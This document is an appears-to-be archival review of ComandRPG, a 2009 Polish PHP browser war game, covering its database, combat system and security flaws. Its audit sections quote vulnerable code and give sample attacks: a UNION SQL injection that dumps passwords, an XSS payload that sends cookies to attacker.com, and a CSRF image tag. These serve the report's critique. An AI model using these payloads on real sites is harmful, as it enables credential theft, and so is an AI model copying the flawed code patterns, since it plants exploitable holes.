Comand RPG

Game Name: ComandRPG (also stylized as "Comand RPG")

Genre: WWII Military Combat RPG

Theme: World War II soldier simulator with equipment management and turn-based combat

License: GNU General Public License v2 (GPL v2) - Polish translation included

Version: 0.1 (early alpha/pre-release stage)

Copyright: © 2009 ComandRPG

Authors: Khulmar (primary), boosik01 (contributor)

Language: Polish (UTF-8 Polish collation for database, ISO-8859-1 for HTML)

Technology: PHP 5.x, MySQL 5.x (MyISAM engine), HTML 4.01 Transitional, inline CSS

Release Date: 2009 (based on copyright headers)

Distribution Status: Open-source project, incomplete development (version 0.1 indicates early abandonment)

Analysis: Extremely lightweight game (under 1 MB total), indicating minimal content and early-stage development. The 26 PHP files suggest basic functionality only. Multiple empty index.htm files (8 total) show directory access protection attempts. GPL v2 license in Polish (341 lines) demonstrates commitment to open-source but suggests limited international distribution plans.

Database Schema (8 tables):

• chat - Chat system
• Fields: id, autor (author), text
• Character set: utf8_polish_ci
• Contains 44 auto_increment value (evidence of 43+ chat messages in development/testing)

• ekwipunek (Equipment/Inventory)
• Fields: id, owner (user_id), atak (attack), stan (status 0/1 for equipped), nazwa (item name)
• Decimal attack values (12,1 precision)
• Empty table (no default items)

• enemy - Enemy NPC definitions
• Fields: id, name, atak, weapons, szybkosc (speed), obrona (defense), kasa (money), hp
• Default enemies included:
• "Dezerter" (Deserter): 10 attack, 5 weapons, 10 speed, 10 defense, 100 money, 150 HP
• "Zbuntowany porucznik" (Rebellious Lieutenant): 15 attack, 15 weapons, 15 speed, 15 defense, 500 money, 200 HP
• Only 2 enemies in entire game (minimal content)

• konta (Accounts/Characters) - Primary player data table
• Authentication: login, haslo (password - plaintext), email, ip
• Stats: atak, obrona, szybkosc, exp, max_exp, lvl, suma (total stat points)
• Resources: kasa (money), zycie/maxzycie (HP), zmeczenie/max_zmeczenie (fatigue 0-50)
• Profile: wiek (age), hobby, opis (description), gender, pochodzenie (origin - default "Miasto"/City)
• System: online (timestamp), chat (Y/N flag), rank (default 'User'), tuti (tutorial 0/1 flag), gg (Gadu-Gadu IM number - Polish IM service)
• Default starting stats: 23 attack, 10 defense, 6 speed, 1500 money, 100 HP, 50 max fatigue, 0 XP/50 max XP
• Empty table (no default accounts)

• mail - Private messaging system
• Fields: id, owner, text, title, autor, autor_id, date, if_read (Y/N), type, do_user
• Supports inbox/outbox with read/unread status
• Empty table

• newsy (News) - Announcements system
• Fields: id, text
• Empty table (no default news entries)

• sklep (Shop) - Item store
• Fields: id, nazwa (name), atak (attack bonus), cena (price)
• Default weapons (WWII theme confirmed):
• "Nóż" (Knife): 5 attack, 250 money
• "M1 Garand rifle": 25 attack, 1250 money
• "Thompson M1A1 SMG": 50 attack, 2500 money
• "Browning automatic rifle": 75 attack, 3750 money
• "Springfield M1903": 100 attack, 5000 money
• 5 total weapons (minimal progression)

PHP Architecture:

• Session-based authentication: $_SESSION['login'] and $_SESSION['pass'] (plaintext password storage)
• Common files: config.php (database), session.php (auth), user.php (User class), verify_mail.php (email validation), reset.php
• Page structure: head.php/bottom.php includes, head_index.php for public pages
• User class: OOP approach with getBasic($pid) method loading player data into $user->get array
• Direct SQL queries: No abstraction layer, uses deprecated mysql_* functions

Combat System Architecture:

• Turn-based combat with maximum 20 rounds
• Speed-based turn order: Higher speed attacks first each round
• Attack formula: (attack + weapon_bonus) - defense / rand(1,3)
• Defense evasion: If defender's defense >= attacker's damage, attack is dodged
• Victory conditions:
• Win: Enemy HP reaches 0 → gain enemy's money
• Loss: Player HP reaches 0 → lose enemy's money (or entire bank if insufficient)
• Draw: 20 rounds expire → "Walka nierozstrzygnięta" (Fight inconclusive)
• Fatigue system: Each fight increases zmeczenie by 1, +1-3 XP gained
• Maximum fatigue: Cannot fight when zmeczenie == max_zmeczenie (50)

Core Game Loop:

• Character Creation:
• Username (minimum 5 characters)
• Password (minimum 6 characters - plaintext storage)
• Email (validated via verify_mail.php)
• Gender selection: "Mężczyzna" (Male) or "Kobieta" (Female)
• Origin selection: "Górskie lasy" (Mountain forests), "Pustynia" (Desert), or "Miasto" (City)
• Initial tutorial flag (tuti = 0) → redirects to tuti.php (tutorial page)
• Starting stats vary by origin (implemented via switch statement in reg.php)

• Main Gameplay:
• Documents page (main.php): View character stats (nick, origin, email, attack, defense, speed)
• Shop (shop.php): Purchase WWII weapons (5 items total) using money
• Equipment (equip.php): Manage inventory, equip weapons (only 1 weapon can have stan=1)
• Fight (fight.php): Select enemy from dropdown, engage in turn-based combat
• Training (trening.php): Presumably stat improvement (file exists but not analyzed)
• Hospital (hospital.php): Likely HP restoration (file exists but not analyzed)
• Chat (chat.php): Community chat with 44-message history from testing
• Mail (mail.php): Private messaging system
• Rankings (ranking.php): Leaderboard system
• View (view.php): View other players' profiles
• Panel (panel.php): Account settings

• Weather System (Advertised but Not Implemented):
• Marketing claim: "W walkach pogoda ma znaczenie, dlatego też gdy pada deszcz to twój żołnierz słabnie, zaś gdy jest ładna pogoda twój żołnierz walczy z maksymalną siłą." ("Weather matters in battles - when it rains your soldier weakens, but in good weather your soldier fights at maximum strength.")
• Reality: No weather variables in database schema, no weather logic in fight.php
• Conclusion: Feature promised but never implemented (version 0.1 alpha state)

• Progression Systems:
• Experience: Gain 1-3 XP per fight (random), level up when exp >= max_exp
• Money: Earn from victories, spend in shop, lose on defeats
• Equipment: 5-weapon progression (knife → rifle → SMG → BAR → sniper)
• Fatigue: Regeneration system not visible in code (likely time-based or hospital visit)
• Stats: Attack, defense, speed (presumably improvable via training.php)

Signs of Development/Testing Activity:

• Chat table: AUTO_INCREMENT=44 indicates 43 chat messages were sent during development/testing
• All other tables: Empty or contain only default seed data (2 enemies, 5 shop items)
• No production data: Game was never released to public or had extremely limited testing phase

Player Activity Assessment: MINIMAL TO NONE - The game appears to have been tested only by developers (chat activity), with no evidence of public release or player base.

Rating: 3/10 (Below Average - Early Alpha Quality)

Strengths:

• GPL v2 licensing: Proper open-source distribution with Polish translation of license
• Code documentation: Every PHP file has GPL header block with authors, version, copyright
• OOP attempt: User class shows understanding of object-oriented design patterns
• Input validation: Some validation exists (username length, email format checking, array whitelisting for gender/origin)
• Combat system: Functioning turn-based combat with speed-based turn order and multiple outcomes

Critical Weaknesses:

• Plaintext password storage: haslo field stores passwords in plaintext (security disaster)

mysql_query("SELECT `login`, `haslo` FROM `konta` WHERE `login`='".htmlspecialchars($_POST['login'])."' AND `haslo`='".htmlspecialchars($_POST['haslo'])."'");

SQL Injection Vulnerabilities:

• Extensive use of string concatenation in queries

mysql_query("SELECT * FROM `enemy` WHERE `id`=".$_GET['enemy']);
mysql_query('SELECT * FROM `sklep` WHERE `id`='.$_GET['kup']);

• GET parameters directly inserted without parameterization
• Only htmlspecialchars() used (does NOT prevent SQL injection)

• Deprecated mysql_* functions: All database code uses mysql_query(), mysql_fetch_array(), mysql_num_rows() (removed in PHP 7.0+)

• XSS vulnerabilities: User input echoed directly to pages

echo '<p>'.$i->text.'</p>'; // News content
echo '<p>'.$item['nazwa'].'</p>'; // Item names

Session Security Flaws:

• Password stored in session: $_SESSION['pass'] (plaintext password in memory)
• No CSRF protection on any forms
• No session regeneration after login

• Logic errors:
• Deprecated ereg() function used (removed PHP 7.0): ereg("^[0-9]*$", $_GET['enemy'])
• get_magic_quotes_gpc() check for non-existent var_dumpa() function
• Weather system advertised but not implemented

• Character encoding mess: Mixed latin2, latin1, utf8_polish_ci in database; ISO-8859-1 in HTML

• Incomplete implementation: Version 0.1 with promised features (weather) not coded

Code Maturity: This is alpha-stage code with fundamental security flaws and incomplete features. The developers understood basic concepts (OOP, validation) but lacked security knowledge and abandoned the project before beta quality.

Innovation Rating: 4/10 (Low-Moderate)

Novel Elements:

• Fatigue mechanic: Innovative stamina system limiting consecutive battles (zmeczenie counter)
• Speed-based turn order: Not just highest speed goes first - speed determines who attacks each individual round
• WWII theme for Polish audience: Niche combination (WWII + browser RPG + Polish language)
• Origin system: Character creation choices affect starting stats (3 origins with different bonuses)
• Equipment status flags: stan field (0/1) allows inventory collection with single active weapon

Derivative Elements:

• Turn-based combat: Standard RPG formula
• Shop → Fight → Level → Shop loop: Universal browser RPG progression
• Attack/Defense/Speed stat trinity: Common RPG mechanic
• Chat/mail/rankings/profiles: Standard social features

Overall Innovation: Lower-middle tier. The fatigue mechanic and speed-based turn resolution show creative thinking, but the game is fundamentally a standard stat-based browser RPG with a WWII skin. The promised weather system (if implemented) would have been innovative, but it remains vaporware.

Security Assessment: CATASTROPHIC

This game has every major vulnerability from the 2009 era:

• Plaintext password storage (no hashing whatsoever)
• SQL injection (GET parameters directly in queries)
• XSS attacks (user content echoed without sanitization)
• CSRF (no tokens on any forms)
• Session fixation (no session regeneration)
• Password in session (plaintext password kept in $_SESSION['pass'])

Danger Level: EXTREME - Any deployment would be compromised within hours. Database would be dumped, all accounts stolen, site defaced.

Modern Viability: 1/5 (Essentially Zero)

Why This Game Cannot Be Used Today:

• Non-functional on modern PHP: Uses mysql_* functions (removed PHP 7.0, 2015)
• Security nightmare: Plaintext passwords, SQL injection, XSS everywhere
• Incomplete: Version 0.1 with advertised features (weather) not implemented
• Minimal content: 2 enemies, 5 weapons, no quests, no story
• Polish-only: Limited market appeal outside Poland
• Deprecated functions: ereg() removed PHP 7.0, get_magic_quotes_gpc() removed PHP 7.4

Modernization Cost Estimate:

However: Even with $8,100 investment, the resulting game would be a basic browser RPG with 2009-era gameplay and minimal content. The Polish-only language would limit market to ~38 million people. Return on investment: Negative.

Better Alternative: Build modern game from scratch using Laravel/React for $10,000-$15,000 with 2024 standards.

Historical Value:

This game is a time capsule of Polish indie game development in 2009:

• Language barrier: Polish-only content shows domestic market focus pre-globalization
• Gadu-Gadu integration: gg field in user table references Polish IM service (dominant 2000s Poland, now obsolete)
• GPL adoption: Shows Polish developer awareness of open-source licensing
• WWII theme: Polish historical interest (WWII deeply significant in Polish culture)
• Alpha abandonment: Typical of solo/duo indie projects with no funding (Khulmar + boosik01)

The game never progressed beyond alpha testing (43 chat messages, 0 players) and represents the high abandonment rate of amateur browser RPG projects in the late 2000s. The promise-versus-delivery gap (weather system advertised but not coded) shows classic feature creep and scope mismanagement.

Critical Vulnerabilities (2009 OWASP Top 10 violations):

• A1: Injection - SQL injection everywhere

// Vulnerable to SQL injection
$enemy = mysql_fetch_object(mysql_query("SELECT * FROM `enemy` WHERE `id`=".$_GET['enemy']));
// Attack: fight.php?enemy=1 OR 1=1

A2: Broken Authentication

• Plaintext password storage

// Plaintext password storage
CREATE TABLE `konta` (`haslo` varchar(100) NOT NULL default '');
// Password in session
$_SESSION['pass'] = htmlspecialchars($_POST['haslo']);
// No password hashing, no encryption

• A3: Sensitive Data Exposure
• Passwords stored in plaintext in database
• Passwords stored in plaintext in sessions
• Email addresses exposed via profiles
• IP addresses logged without consent notice

• A7: XSS (Cross-Site Scripting)

// User content echoed without encoding
echo '<p>'.$i->text.'</p>'; // News entries
echo '<p>'.$item['nazwa'].'</p>'; // Item names from database
// Attack: News entry with <script>alert(document.cookie)</script>

A8: CSRF (Cross-Site Request Forgery)

• No CSRF tokens on any forms
• Shop purchases via GET: shop.php?kup=1
• Combat via GET: fight.php?enemy=1
• Account changes unprotected

Additional Vulnerabilities:

• Deprecated functions:
• mysql_* removed PHP 7.0 (non-functional since 2015)
• ereg() removed PHP 7.0
• get_magic_quotes_gpc() removed PHP 7.4

• Character encoding issues:
• Mixed encodings (UTF-8, latin1, latin2, ISO-8859-1)
• Polish characters may break in some contexts

• No prepared statements: Every query vulnerable to injection

• No input filtering: Only htmlspecialchars() used (insufficient)

• Session management flaws:
• No session_regenerate_id() after login
• No session timeout
• No "remember me" secure implementation

Exploitation Scenarios:

SQL Injection → Database Dump:

GET /fight.php?enemy=1 UNION SELECT login,haslo,email,1,1,1,1 FROM konta--
Result: Dump all usernames, plaintext passwords, emails

XSS → Cookie Theft:

POST news entry: <script>fetch('http://attacker.com?c='+document.cookie)</script>
Result: Admin session stolen, site compromised

CSRF → Unauthorized Purchases:

<img src="http://victim.com/shop.php?kup=5"> embedded in external site
Result: Victim unknowingly purchases expensive weapon

Password Exposure:

• Single database breach exposes ALL passwords in plaintext
• No recovery from this - users can't change passwords if attacker has them

For Historical/Academic Use Only:

• DO NOT DEPLOY: This game is critically insecure and non-functional on modern PHP
• Educational value: Study as example of 2009-era security mistakes
• Archival: Preserve as artifact of Polish indie game development
• GPL compliance: Respect GPL v2 license if redistributing/studying

If Attempting Modernization (Not Recommended):

• Security overhaul (MANDATORY):
• Migrate to PDO/mysqli with prepared statements
• Implement bcrypt/Argon2id password hashing
• Add CSRF tokens to all forms
• Implement XSS protection (htmlspecialchars with ENT_QUOTES on all output)
• Remove password from session storage
• Add session regeneration after login

• Technical debt:
• Replace deprecated mysql_* functions (8 hours)
• Remove ereg() (use preg_match())
• Fix character encoding to UTF-8 throughout
• Implement weather system (16 hours) to deliver on marketing promises

• Content expansion:
• Add 20-30 more enemies (minimum)
• Create 50+ weapons for progression
• Implement quest system
• Write storyline/lore
• Add training system
• Develop hospital recovery mechanics

• Internationalization:
• English translation (minimum for market viability)
• Multi-language support framework

Realistic Assessment: Modernization would cost $8,100+ and result in mediocre 2009-era browser RPG. Better to build new game from scratch using modern frameworks (Laravel + React/Vue) for similar investment with 2024 standards and scalability.

Preservation Value: Archive as example of:

• Polish indie game development (2009)
• GPL adoption in Polish development community
• WWII themes in Polish gaming culture
• Early alpha abandonment patterns
• Security practices of 2009 era (what NOT to do)
• Gadu-Gadu integration (Polish IM service nostalgia)

Game Type: Early-alpha WWII soldier browser RPG with turn-based combat and fatigue mechanics

Development Status: Abandoned at version 0.1 (2009)

Completion Level: ~25% (core combat works, but minimal content, missing promised features)

Code Quality: 3/10 (functional core, catastrophic security, deprecated APIs)

Innovation: 4/10 (fatigue mechanic and speed-based turns show creativity)

Security: CATASTROPHIC (plaintext passwords, SQL injection, XSS, no CSRF protection)

Modern Viability: 1/5 (non-functional on PHP 7+, requires $8,100+ modernization for minimal return)

Historical Significance: Low-moderate (documents Polish indie game development, GPL adoption, Gadu-Gadu era)

Best Use Case Today: Educational study of 2009-era security vulnerabilities and abandoned indie project patterns. Should NOT be deployed under any circumstances.

Unique Characteristics:

• Fatigue-based combat limiting (innovative for 2009)
• WWII theme targeting Polish market
• Weather system promised but not implemented (classic feature creep)
• Gadu-Gadu IM integration (Polish cultural artifact)
• GPL v2 with Polish translation (shows licensing awareness)

Bottom Line: ComandRPG represents an ambitious but prematurely abandoned solo/duo project from 2009 Poland. The developers (Khulmar + boosik01) had some good ideas (fatigue system, speed-based combat) but lacked security expertise and likely ran out of motivation during alpha development. The game's 43 chat messages and 0 players tell the story of a project that never escaped internal testing. Modern deployment is impossible due to PHP 7+ incompatibility and catastrophic security flaws. Estimated modernization cost ($8,100) exceeds value of resulting product. Preserve as historical artifact only.

Final Recommendations

Rating Summary